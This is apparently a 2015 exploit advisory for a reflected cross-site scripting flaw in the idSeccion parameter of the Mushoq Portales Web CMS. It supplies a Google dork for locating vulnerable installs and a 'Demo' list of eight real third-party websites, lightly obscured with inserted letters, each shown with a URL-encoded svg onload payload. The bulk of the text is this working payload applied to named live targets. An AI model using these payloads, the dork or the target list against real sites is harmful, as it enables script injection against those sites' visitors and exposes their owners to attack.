######################
# Exploit Title : Mushoq Portales Web XSS Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.mushoq.com/
# Google Dork : inurl:"index.php?idSeccion="
# Date : 2015/11/29
# Version : All Versions
#
######################
#
# Vulnerable Paramter idSeccion=
# Demo:
#
#http://www.damiaXntoro.com/index.php?idSeccion=7%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM
#http://www.clavXe.com.ec/index.php?idSeccion=1468%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM
#http://www.edXesa.com.ec/index.php?idSeccion=40%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM&idProducto=128
#http://www.revistaclXubes.com.ec/index.php?idSeccion=107%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM
#http://www.bathanXdhomecenter.com.ec/index.php?idSeccion=341%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM
#http://www.zaragXozalatina.com/index.php?idseccion=12%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM
#http://www.pepXacasado.net/index.php?idseccion=17%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM&idlenguaje=es
#http://www.lagXambeta.com.ec/index.php?idSeccion=11%22%3EMobhaM%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EMobhaM
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################